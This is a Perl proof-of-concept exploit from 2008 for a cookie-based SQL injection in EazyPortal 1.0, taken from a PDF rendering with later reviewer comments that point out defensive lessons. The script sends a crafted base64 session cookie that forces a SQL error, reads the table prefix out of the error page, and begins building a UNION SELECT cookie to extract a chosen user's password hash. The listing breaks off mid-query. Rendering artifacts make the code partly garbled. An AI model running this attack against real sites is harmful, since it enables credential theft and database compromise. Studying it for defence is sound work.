1 #!/usr/bin/perl
2 #
3 #
Vendor url: http://www.eazyportal.com/
4 #
5 #
by Iron - http://www.randombase.com
6 #
7 #
The injection is delivered through $_COOKIE
8 #
# Proof-of-concept for the SQL injection in EazyPortal <= 1.0 described in the
# header above.  Per that header the injected value reaches the application
# through the session_vars cookie rather than through a GET/POST parameter.
#
# NOTE(review): this listing is a PDF-to-text rendering.  The numbers at the
# start of most lines are gutter line numbers, and the long cookie line is
# wrapped across several lines; both are artifacts of the rendering, not code.
#
# Defender takeaways visible in this script:
#   1. The application uses cookie contents in a SQL statement, so cookie
#      values have to be treated as untrusted input and the query parameterised.
#   2. The table prefix is learned by parsing the failing SQL statement out of
#      the response body (see the regex below): verbose database errors returned
#      to the client are themselves an information leak.
#   3. Observable indicators: a base64 session_vars cookie whose decoded value
#      contains a quote character, and responses carrying raw SQL text.
#
# MIME::Base64 is not used in the visible part of the script; presumably the
# cookie for the extraction step is encoded with it further down — confirm.
9 use LWP::UserAgent;
10 use MIME::Base64;
11
12 print "#
13
# EazyPortal <= 1.0 SQL Injection Exploit
14
# By Iron − www.randombase.com
15
# Greets to everyone at RootShell Security Group
16
#
17
# Example target url: http://www.target.com/Portal/
18 Target url?";
# Read the target base URL from stdin and normalise it: prepend http:// when
# no scheme was given, and make sure it ends in a slash so paths can be appended.
19 chomp($target=<stdin>);
20 if($target !~ /^http:\/\//)
21 {
22

$target = "http://".$target;
23 }
24 if($target !~ /\/$/)
25 {
26

$target .= "/";
27 }
# The user id is read here but not referenced in the visible part of the
# script; presumably it is interpolated into the query being built at the end
# of this listing — confirm against the rest of the file.
28 print "User id to retrieve name/password from? (1 = admin by default)";
29 chomp($target_id=<stdin>);
30 print "\n[+]Retrieving table prefix...";
# The probe is a single Cookie header.  The session_vars value is base64 and
# appears to decode to a PHP serialize()d array whose uname field contains a
# single quote — that is what makes the portal's query fail and echo itself
# (confirm by decoding the value).  The request itself is just GET of the
# portal root with this cookie attached.
31 @header = (’Cookie’ => ’ session_vars=YTo2OntzOjU6InVuYW1lIjtzOjEyOiInIEVSUk9SIFpPTUciO3M6NDoidXB3ZCI7czozMjoiMDk4ZjZiY2Q0NjIxZDM3M
2NhZGU0ZTgzMjYyN2I0ZjYiO3M6MzoidWlkIjtzOjE6IjEiO3M6NDoidWdtdCI7czoyOiIrMCI7czoxMDoidWxhc3R2aXNpdCI7czoxMDoiMTIwNDA0NjIwNiI7czo0OiJ
wcml2IjthOjk6e3M6NDoibmV3cyI7czo0OiJuZXdzIjtzOjU6InBvbGxzIjtzOjI6InBvIjtzOjc6Im1haWxpbmciO3M6MjoibWEiO3M6NToicGFnZXMiO3M6MjoicGEiO3M6N
ToidXNlcnMiO3M6MjoidXMiO3M6ODoic2V0dGluZ3MiO3M6Mjoic2UiO3M6NToiZm9ydW0iO3M6MjoiZm8iO3M6NjoiYmxvY2tzIjtzOjI6ImJsIjtzOjg6ImRvd25sb2Fk
IjtzOjI6ImRvIjt9fQ==’);
# Plain LWP client: 10 second timeout, proxy settings taken from the
# environment, and a browser-looking User-Agent string.  From the server's
# side the only thing that distinguishes this request is the cookie.
32 $ua = LWP::UserAgent−>new;
33 $ua−>timeout(10);
34 $ua−>env_proxy;
35 $ua−>agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
36 $response = $ua−>get($target, @header);
# On a 2xx response, scrape the failing statement out of the page body: the
# capture between "from " and "users" is the table prefix.  If the body does
# not contain the statement the script falls back to an empty prefix.
37 if ($response−>is_success)
38 {
39 #print $response−>content;
40

if($response−>content =~ /select \* from (.*)users where ustatus/i)
41

{
42

print "\n[+]Got prefix: $1";
43

# $1 is still the capture from the match two statements up; this works
# because nothing in between runs another regex, but it is fragile.
$prefix = $1;
44

}
45

else
46

{
47

print "\n[−]Failed, trying empty prefix.";
48

$prefix = "";
# NOTE(review): the next four lines are the page footer of the PDF rendering
# (page number, document title, author, date), not part of the script.
Page 1/3
EazyPortal 1.0 COOKIE Remote SQL Injection Exploit
Iron
02/27/2008
49

}
50 }
# Any non-success HTTP status aborts with the status line.
51 else
52 {
53 die "Error: ".$response−>status_line;
54 }
# The script continues past this listing by assembling a UNION SELECT cookie
# for the actual extraction step; that statement is cut off at the end of
# this page.
55 print "\n[+]Building cookie";
56 $query = "lalalalalala’ UNION SELECT upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upw